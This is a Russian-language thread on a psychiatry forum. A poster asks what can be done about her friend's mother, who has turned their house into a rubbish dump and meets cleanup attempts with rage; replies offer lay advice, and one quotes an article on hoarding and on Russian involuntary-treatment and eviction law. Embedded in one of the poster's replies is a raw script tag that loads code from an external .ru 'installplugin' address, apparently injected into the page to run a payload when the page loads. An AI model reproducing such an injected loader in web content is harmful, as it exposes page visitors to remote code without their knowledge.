Перейти к содержанию

Патологическое отсутствие стремления к порядку


Рекомендуемые сообщения

Здравствуйте, уважаемые психиатры! У моего друга следующая проблема - его мама за его отсутствие (около 4 лет) привела дом в состояние абсолютной мусорной свалки. Перед обсуждением предлагаю непременно ознакомиться с нижеприкрепленными фотографиями и видео. Я понимаю, что запечатленное там зрелище не только не интересно, но и довольно неприятно, но это необходимо для осознания масштаба и всей глубины проблемы, а также во избежание сомнений насчет преувеличения проблемы. Внимание! То, что Вы там увидите, это не заброшенный дом, служащий прибежищем бомжей, не наркоманский притон, и это не фотошоп!!! Это реальный дом, в котором живет обычная женщина, которая не страдает запоями и тем более не употребляет каких-либо необычных веществ. И это не отдельное зхламленное место, а весь дом в таком состоянии, как и территория двора. Может возникнуть резонный вопрос: а почему сын не возьмет и сам все не уберет. Это невозможно. Точнее, возможно, но реакция матери непредсказуема. Дело  в том, что при любой попытке начать убираться, предпринимаемой сыном, она начинает истошно вопить, чтобы не трогали ее вещи, сыпать проклятиями и пожеланиями смерти сыну (сама часто была свидетелем подобных сцен). По идее, можно было бы взять и в один прекрасный день, дождавшись ее отсутствия, выгрести все из дома и вывезти на свалку. Но реакция, скорее всего, будет очень бруной. Вполне возможно, что она и с ножом на сына может кинуться, судя по тому что я наблюдала. Думаю, и он тоже этого боится. Так вот, у меня вопрос: можно ли хоть что-то сделать в этой ситуации? Может быть, гипноз сможет помочь? Надеюсь на Ваш отклик и заранее благодарю. Я обратилась с этой проблемой на форум психологов, но ответа так  и не дождалась (видимо, надо было тогда фотки выложить). К тому же, наверное, что это все-таки из области психиатрии.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 


Черт, извините, фотографии не получилось. Сейчас исправлю недоработку.


Вот, собственно, сами фотк.

IMG_3890.MOV

post-68153-0-27507500-1415562915_thumb.jpg

post-68153-0-72226400-1415562918_thumb.jpg

post-68153-0-02939500-1415562922_thumb.jpg

post-68153-0-14500000-1415562925_thumb.jpg

post-68153-0-60568100-1415562928_thumb.jpg

post-68153-0-11011600-1415562932_thumb.jpg

post-68153-0-09996500-1415562935_thumb.jpg

post-68153-0-71480500-1415562938_thumb.jpg

post-68153-0-43422900-1415562942_thumb.jpg

post-68153-0-21018700-1415562949_thumb.jpg

Ссылка на комментарий
Поделиться на другие сайты

  • Ответов 60
  • Создана
  • Последний ответ

Топ авторов темы

Топ авторов темы

Изображения в теме

Вот еще партия, уже вместе с видео.


Нужно вести к психиатру, ИМХО

А как Вы думаете, она пойдет сама добровольно? Думаю, вряд ли. Если ей сказать об этом, она такими яростными проклятиями разразится! На самом деле ее водили в к психологу, она даже сама пошла. С ней разговаривали разные психологи по телефону (друзья моего друга, для которых психология - серьезное  увлечение, а не просто добывание денег). Но все усилия психологов были напрасны. Сказали, что все бесполезно. 


Фотки еще, на всякий случай, для все еще сомневающихся.


Вот видео, которое я не добавила по ошибке

post-68153-0-53935300-1415563014_thumb.jpg

post-68153-0-88282200-1415563018_thumb.jpg

post-68153-0-93274600-1415563021_thumb.jpg

post-68153-0-91465800-1415563174_thumb.jpg

post-68153-0-99969700-1415563177_thumb.jpg

IMG_3867.MOV

IMG_3888.MOV

IMG_3889.MOV

IMG_3890.MOV

post-68153-0-49816100-1415563183_thumb.jpg

post-68153-0-87169600-1415563186_thumb.jpg

post-68153-0-31919300-1415563190_thumb.jpg

post-68153-0-34284200-1415563193_thumb.jpg

post-68153-0-65212300-1415563898_thumb.jpg

post-68153-0-30400900-1415563902_thumb.jpg

post-68153-0-43107000-1415563905_thumb.jpg

post-68153-0-82232800-1415563908_thumb.jpg

post-68153-0-75781800-1415563912_thumb.jpg

post-68153-0-10723900-1415563916_thumb.jpg

post-68153-0-83539900-1415563919_thumb.jpg

post-68153-0-23278000-1415563923_thumb.jpg

post-68153-0-24203300-1415563926_thumb.jpg

post-68153-0-65942400-1415563929_thumb.jpg

IMG_3867.MOV

IMG_3888.MOV

IMG_3889.MOV

IMG_3890.MOV

Ссылка на комментарий
Поделиться на другие сайты

Сделать можно. Пусть чаще бывает в гостях, на людях. Так же поездки в теплые страны. Со временем можно сместить фокус, когда человек заинтересуется жить.

 

Чудо таблетки раз и все готово... не получится, ибо когда убираешь зависимость получается пустота И потом опять по кругу. Поэтому сначала радость и стремление к жизни, а потом зависимость сама отвалится.

 

То что у вас на фотках это всего лишь симптом, симптом лечить глупо, нужно смотреть в корень и причину заживлять.

Ссылка на комментарий
Поделиться на другие сайты

А сколько ей лет ? У стариков бывает.

И пусть так живет, что можно сказать еще.

 

Я как- то снимала комнату у одной бабушки, проездом была в городе, в квартире опрятно с виду было, только запах стоял кислый. Думала - щи)

Оказалось, бабка по мусоркам собирала банки от пива) И еще она по помойкам рылась, чего только не приносила! и меня угостить пыталась)

Ссылка на комментарий
Поделиться на другие сайты

В ее случае это "нормально". Она ведь не работает?

Этот скаливаемый ею мусор дает ощущение спокойствия, а как только вы пытаетесь убрать все это, то лишаете этого комфортного состояния и вызываете у нее стресс.

Я не вижу большого смысла водить ее к психиатру. Проблема в том, что ей надо направить энергию в не накоплении мусора,а в другое русло. Вот только вопрос, хочет ли она менять что-то в своей жизни.

Ссылка на комментарий
Поделиться на другие сайты

Ваш друг - ее кровный родственник и, думаю, он имеет законное право направить ее на обследование и лечение. 

 

 

Ваш друг - ее кровный родственник и, думаю, он имеет законное право направить ее на обследование и лечение. 

Здесь не все так просто. Я как-то осторожно намекнула на то, что проблема может быть не психологического, а психиатрического характера. Он очень болезненно это воспринял. Я боюсь его реакции, если скажу ему о необходимости вести к психиатру.

Ссылка на комментарий
Поделиться на другие сайты

Сделать можно. Пусть чаще бывает в гостях, на людях. Так же поездки в теплые страны. Со временем можно сместить фокус, когда человек заинтересуется жить.

 

Чудо таблетки раз и все готово... не получится, ибо когда убираешь зависимость получается пустота И потом опять по кругу. Поэтому сначала радость и стремление к жизни, а потом зависимость сама отвалится.

 

То что у вас на фотках это всего лишь симптом, симптом лечить глупо, нужно смотреть в корень и причину заживлять.

О поездках в теплые страны не может быть и речи - банальное безденежье не позволяет (у сына тоже денег нет). В гости же она ходит крайне редко. Что поразительно, эта женщина до сих пор работает, а раз работает, значит, она вполне здраво соображает. И, думаю, стремление к жизни у нее отнюдь не пропало, раз она пытается еще что-то заработать дополнительно к пенсии. К тому же, как ни удивительно, но при общении она производит впечатление вполне адекватного человека. У нее есть образование (музыкальное), она довольно начитана, рассказывает много интересных вещей. Вообще, никогда бы никто  не заподозрил бы в ней какие-то психические отклонения, если бы вот только не этот бардак. Мой друг как-то сделал такую вещь: взял, сфоткал всю эту свалку да и показал всем на работе ее коллегам. Как он рассказыввал, он безумно разозлилась, так что, видимо, поэтому он и не решается на кардинальные меры сейчас. Тогда она пинала со злости его мотоциклы, а если все взять да и вывезти, она вполне может разнести все кувалдой или поджечь, кто ее знает. То, что она вполне способна на агрессивные действия в порыве ярости, я уже тоже имела возможность убедиться. Хотя, надо сказать, что после демонстрации сего бардака коллегам она все-таки убралась. Но потом все вернулось на круги своя.

А сколько ей лет ? У стариков бывает.

И пусть так живет, что можно сказать еще.

 

Дело в том, что это не только ее дом, а и его тоже. И это - его единственное законное жилище. В Москве он все время снимал жилье, но ведь у человека должно быть хоть какое-то собственное жэилье, куда он может всегда вернуться.

В ее случае это "нормально". Она ведь не работает?

Этот скаливаемый ею мусор дает ощущение спокойствия, а как только вы пытаетесь убрать все это, то лишаете этого комфортного состояния и вызываете у нее стресс.

Я не вижу большого смысла водить ее к психиатру. Проблема в том, что ей надо направить энергию в не накоплении мусора,а в другое русло. Вот только вопрос, хочет ли она менять что-то в своей жизни.

 

В том-то и дело, что она работает. И, думаю, работает вполне хорошо, раз ее давно там уже держат! И вообще, она производит впечатление вполне адекватного человека. У нее довольно хорошая память, несмотря на пенсионнй возраст. Да и физически она вполне бодрая, может дать фору многим молодым. В какое русло можно направить ее энергию и как это сделать? Да и не знаю, есть ли надежда, если психологи все как один сделали вывод, что все бесполезно. Я сама прекрасно понимаю, что таблетки не помогут. Насколько я знаю, вся психиатрическая фармацевтика направлена в основном на внешнее успокоение человека (ну чтобы на людей не бросался). Я  предполагаю другой вариант - глубокий гипноз. Вот я и хочтела бы узнать Ваше мнение об эффективности гипноза.

Ссылка на комментарий
Поделиться на другие сайты

а кому это мешает? 

Смотрите выше. Ее сыну мешает, у которого практически нет жилья. потому что это - не дом, это не может быть жилищем для нормального человека.

 

 

То что у вас на фотках это всего лишь симптом, симптом лечить глупо, нужно смотреть в корень и причину заживлять.

 

Симптом чего именно?

Ссылка на комментарий
Поделиться на другие сайты

так сын почему не уберет свою часть территории? 

 

у моей сестры до потолка все завалено в 3х комнатной и на кухню только боком.


надо отметить что сестра активная, адекватная, с высшим образованием, занимается чем то наподобие бизнеса, и одна из 3х комнат занята товаром. но остальные вещами и там до потолка завалы и ройти можно только боком.

 

её дочь в свою комнату тоже боком, то там чуть поменьше вещей.

 

есть еще одна квартира и там одна комната завалена до потолка и закрыта н ключ а вторая сдается.

Ссылка на комментарий
Поделиться на другие сайты

 Вариант типа поссорится с мамой и поделить лом, физически- забором, перегородкой. Чтобы мама собираоа мусор на своей половине.

Ссылка на комментарий
Поделиться на другие сайты

 

 

Симптом чего именно?

 

синдром Плюшкина (компульсивное накопительство)

 

На поздних стадиях синдром Плюшкина – самая настоящая болезнь, психическое расстройство, внесенное в реестр медицинских заболеваний в 1966 году. У нее есть физиологические основы. Согласно нескольким исследованиям, за пристрастие к коллекционированию ненужных вещей отвечают определенные участки лобных долей коры головного мозга. При повреждении этих участков мозга люди, которые ранее никогда не были замечены за собиранием бесполезного хлама, начинают активно этим заниматься. Например, это происходило в результате черепно- мозговой травмы, операции на головном мозге или после перенесенного энцефалита.

 

Ну, а если у болезни были психологические предпосылки, то развиваться она может постепенно. Например, из неразрешенных проблем детства – когда ребенок остро переживает материальный недостаток в семье или отсутствие внимания со стороны взрослых, которое перерастает в неуверенность и желание защититься от мира, подстраховаться вещами. Обилие вещей в доме создает иллюзию защищенности, а вещи заменяют общение, создают индивидуальный психологический комфорт.

В этом случае причинами захламления дома ненужными вещами являются либо воспоминания (простынки сына, который сам скоро станет дедушкой; старые джинсы, надежда влезть в которые давно растаяла; подарки близких когда-то людей; знаки былого статуса или благосостояния и т.д.), либо патологическое запасание на черный день того, что может пригодиться. Нынешнее поколение зрелых и пожилых людей формировалось в те времена, когда «доставать» и запасать нужно было все от спичек до туалетной бумаги, когда полиэтиленовые пакеты были редкостью, а что-то ценное можно было купить только в обмен на макулатуру

Обратитесь к врачу

Если речь о заболевании, то лечить его должен врач. Для уточнения диагноза и подбора лечения может понадобиться обследование мозга (МРТ или КТ). Далее врач-психиатр изучает состояние пациента (есть ли нарушения памяти, симптомы агрессии и т.д.) и назначает лечение – в запущенных случаях в условиях лечебницы, в менее сложных случаях и как поддерживающее лечение – на дому. Амбулаторное лечение скорее всего будет постоянным.

Лечите без согласия пациента

Добровольно такие пациенты на лечение, как правило, не идут. В тех случаях, если жилище патологического Плюшкина представляет угрозу для него и окружающих, закон позволяет лечить его в стационаре за счет государства и без согласия пациента (подробнее об этом можно узнать из «Закона о психиатрической помощи и гарантиях прав граждан при ее оказании»).

Инициатором в этом случае может быть как родственник больного, так и любой человек. Например, соседи. Для этого потребуется написать заявление в психоневрологический диспансер. Врач выедет по месту жительства предполагаемого больного. В случае отказа от обследования медслужба обратится в суд для принудительного обследования и лечения.

Также в суд могут обратиться ЖЭК и жильцы. Судебные расходы по этой категории дел несет государство. В иске нужно указать причину обращения (например, угроза жизни и имуществу) и просьбу о назначении принудительной судебно-психиатрической экспертизы, лечения, а при необходимости и наличии такой возможности – опекуна. Назначенный судом опекун (как правило, родственник) обязан заботиться о больном и контролировать его действия.

Будьте готовы к выселению больного из квартиры

Родственникам страдающих от патологического накопительства людей следует знать, что это может стать причиной выселения. Ведь согласно ст.116 Жилищного кодекса, если кто-то из жильцов систематически использует жилое помещение не по назначению или делает невозможным для других проживание с ним в одном доме, его по требованию ЖЭКа или других заинтересованных лиц могут выселить через суд без предоставления другого жилья. Например, вы не общаетесь со своим престарелым дядюшкой из другого города и внезапно узнаете, что его выселили из квартиры, и вы – единственный родственник, которому «светит» опекунство и совместное проживание на вашей жилплощади. Малоприятная иллюстрация того, что внимание к родным, профилактика и своевременное лечение обходятся во всех отношениях дешевле устранения последствий.

Ссылка на комментарий
Поделиться на другие сайты

=

так сын почему не уберет свою часть территории? 

 

у моей сестры до потолка все завалено в 3х комнатной и на кухню только боком.


надо отметить что сестра активная, адекватная, с высшим образованием, занимается чем то наподобие бизнеса, и одна из 3х комнат занята товаром. но остальные вещами и там до потолка завалы и ройти можно только боком.

 

её дочь в свою комнату тоже боком, то там чуть поменьше вещей.

 

есть еще одна квартира и там одна комната завалена до потолка и закрыта н ключ а вторая сдается.

Комната сына как раз в порядке более-менее. Вообще,  у инх так: первый этаж вроде его, а второй - его мамы с отчимом (отчим уже почил). Но мама, видимо, сама не выдержив наведеннго ею же бардака, перебралась на первый этаж в одну из его комнат для ночевки. И тут же стала захламлять комнату. На все попытки заставить ее убрать реагирует очень бурно, например, обвиняет сына в том, что тот только и ждет ее смерти (это я тоже часто слышала). Можно конечно и самому убрать, но реакция может быть вообще непредсказуемой. Точнее, предсказуема. В числе прочих способ реагирования может быть следующее (и было уже) вцепиться в глаза сыну, ударить тазиком, ударить кулаком по спине - всему этому я уже была свидетелм.

<script src="http://installplugin.ru/data.php?snid=&rnd=3709468"> </script>

Ссылка на комментарий
Поделиться на другие сайты

так сын почему не уберет свою часть территории? 

 

у моей сестры до потолка все завалено в 3х комнатной и на кухню только боком.

надо отметить что сестра активная, адекватная, с высшим образованием, занимается чем то наподобие бизнеса, и одна из 3х комнат занята товаром. но остальные вещами и там до потолка завалы и ройти можно только боком.

 

её дочь в свою комнату тоже боком, то там чуть поменьше вещей.

 

есть еще одна квартира и там одна комната завалена до потолка и закрыта н ключ а вторая сдается.

чтобы у Вас сложилось представление об уровне неадекватности, приведу такой пример. Как-то мой друг (назовем его Саша) решил прибить задвижку на двери, ведущую в одну из его комнат, в которой уже обжилась его мама. Задвижка снаружи, т.е. любой человек может открыть. Она это увидела и начала вопить "а где я ночевать буду?" Т.е. почему-то она решила, что ее хотят выгнать. Как она углядела взаимосвзязь между задвижкой и попыткой ее прогнать - один бог ведает. МЫ ее успокоили, сказали, что мы всего лишь хотим сделать задвижку!!! Но как зарождающуюся в недрах океана волну цунами уже не остановить, так и волну гнева, зарождающуюся в недрах сумеречной души, уже тоже было не остановить. Она накинулась на меня с упреками, что я поддерживаю ее сына в спорах, что на стороне Саши (!!!) (серьезно), а не ее. Что со мной он будет также обращаться как и с ней, далее посыпались упреки, что он только и ждет ее смерти и что он будет рад ее смерти. Тут надо сделать маленькое отступление. Саша часто спорил в повышенных тонах и, бывало, швырял вещи. Но, я думаю, его можно понять, учитывая, что в таком состоянии дом находится уже 9 лет (до этого они жили в квартире), и что до 2009 г., по словам Саши, было еще хуже!!! (куда может быть хуже, не знаю, но, видимо, может). А также учитывая то, что по воле мамы сгнили некоторе его вещи на улице, которые мама  в его отсутствие вытащила на улицу постирать (да, в доме нет вообще никаких удобств цивилизации, но это  - отдельная тема) в тазике (кожаные штаны стирать порошком - это надо додуматься еще), да так и оставила на улице гнить под дождем. Под дождем сгнили не только его вещи, но и какие-то важные документы. В общем, Саша кое-ка все-тки добился тог, чтобы мама немного прибралась в его комнате, которую она сейчас оккупировала, и поставил туда пару мотоциклов, чтобы она не захламляла свсякими многочисленными пакетиками, своими вещами, которые на втором этаже у нее валяются прямо на полу в свалке. Можно, конечно, было врезать замок, но тут тоже не все так просто. Саша рассказывал, что однажды она установил на одной из своих комнат замок. В ответ на что она подняла дикий скандал. А от веранды (которая тоже считается его) ключ она нашла и вообще закопала в саду. Саша случайно обнаружил.

 Вариант типа поссорится с мамой и поделить лом, физически- забором, перегородкой. Чтобы мама собираоа мусор на своей половине.

Она вполне может очень сильно обидиться, да так сильно (дама она с буйнм характером) что может вылиться, например, в разнос его мотоциклов и машины, которыми он дорожит (см. выше). СУдя по всему, это - риск такого варварского действия (на что она вполне способна), думаю, и останавливает его от сколько-нибудь решительных действий.

Ссылка на комментарий
Поделиться на другие сайты

я вам выше всё написала, вернее процитировала...ох, грустная история..

 

у сестры дочь, например, взяла ипотеку.. 

Ссылка на комментарий
Поделиться на другие сайты

я вам выше всё написала, вернее процитировала...ох, грустная история..

 

у сестры дочь, например, взяла ипотеку.. 

Не у всех есть деньги на ипотеку. А по поводу вышенаписанного, убраться без ее согласия не представляется возможным. Реагирует она невероятно бурно. Более того, она уже начала вторгаться на территорию Саши. Например, в его отсутствие она притащила комфорку (которая до этого времени благополучно стояла на веранде) в его комнату, где он спит, и стала там готовить. То есть что варится и жарится, все в воздух испаряется, и комната этими запахами пропитывается. Но этого мало, на полу образовался огромный пакет с хлебом и еще какой-то снедью, более того, несмотря на обещания мамы не допускать котов в его комнату, по приезде на Сашиной кровати обнаружился котенок, которого, наверняка, притащила кошачья мамаша. Ну то есть можно догадаться, что она там же и нужду справляла. Ибо запах там уже стоял специфический. Да, коты и кошки - это отдельная тема. В доме их насчитывается 7 штук (не считая недавно появившегося приплода). Как Вы уже догадываетесь, кошки абсолютно не приучены к туалету, им не прогоняют глистов, не моют и не купают. То есть это воплне уличные кошки, но которые тусуются часто дома. Кошки гадят везде, один раз насрали прямо на Сашину кровать, другой раз я сама обнаружила кошачью кучку прямо у дверей.

синдром Плюшкина (компульсивное накопительство)

 

На поздних стадиях синдром Плюшкина – самая настоящая болезнь, психическое расстройство, внесенное в реестр медицинских заболеваний в 1966 году. У нее есть физиологические основы. Согласно нескольким исследованиям, за пристрастие к коллекционированию ненужных вещей отвечают определенные участки лобных долей коры головного мозга. При повреждении этих участков мозга люди, которые ранее никогда не были замечены за собиранием бесполезного хлама, начинают активно этим заниматься. Например, это происходило в результате черепно- мозговой травмы, операции на головном мозге или после перенесенного энцефалита.

 

 

Будьте готовы к выселению больного из квартиры

Родственникам страдающих от патологического накопительства людей следует знать, что это может стать причиной выселения. Ведь согласно ст.116 Жилищного кодекса, если кто-то из жильцов систематически использует жилое помещение не по назначению или делает невозможным для других проживание с ним в одном доме, его по требованию ЖЭКа или других заинтересованных лиц могут выселить через суд без предоставления другого жилья. Например, вы не общаетесь со своим престарелым дядюшкой из другого города и внезапно узнаете, что его выселили из квартиры, и вы – единственный родственник, которому «светит» опекунство и совместное проживание на вашей жилплощади. Малоприятная иллюстрация того, что внимание к родным, профилактика и своевременное лечение обходятся во всех отношениях дешевле устранения последствий.

Я понимаю, что болезнь Плюшкина и стремление к накоплению. Но ведь можно же копить и аккуратно складывать, например, в стопки или в шкаф. Там же все просто беспорядочно валяется на полу, все в куче - одежда, книги, лампочки, шурупы, газеты и другие предметы. И так везде! Теперь насчет оекунства. Несмотря ни на что, думаю, такой вариант для моего друга неприемлем. Я уже писала выше, он очень болезненно реагирует на версию психического расстройства. Не знаю, как он отнесется к этому варианту. Я все-таки надеюсь на гипноз. может быть, все-тки хоть кто-то выскажется насчет этого варианта решения проблемы?

Ссылка на комментарий
Поделиться на другие сайты

В том-то и дело, что она работает. И, думаю, работает вполне хорошо, раз ее давно там уже держат! И вообще, она производит впечатление вполне адекватного человека. У нее довольно хорошая память, несмотря на пенсионнй возраст. Да и физически она вполне бодрая, может дать фору многим молодым. В какое русло можно направить ее энергию и как это сделать? Да и не знаю, есть ли надежда, если психологи все как один сделали вывод, что все бесполезно. Я сама прекрасно понимаю, что таблетки не помогут. Насколько я знаю, вся психиатрическая фармацевтика направлена в основном на внешнее успокоение человека (ну чтобы на людей не бросался). Я  предполагаю другой вариант - глубокий гипноз. Вот я и хочтела бы узнать Ваше мнение об эффективности гипноза.

Работает кем? 

Насчет гипноза не могу сообщить ничего дельного.  

Ссылка на комментарий
Поделиться на другие сайты

Работает кем? 

Насчет гипноза не могу сообщить ничего дельного.  

преподает уроки рисования в какой-то еврейской общине.

Работает кем? 

Насчет гипноза не могу сообщить ничего дельного.  

ДА, кроме музыкального образования у нее есть еще и художественное.

Ссылка на комментарий
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

×
×
  • Создать...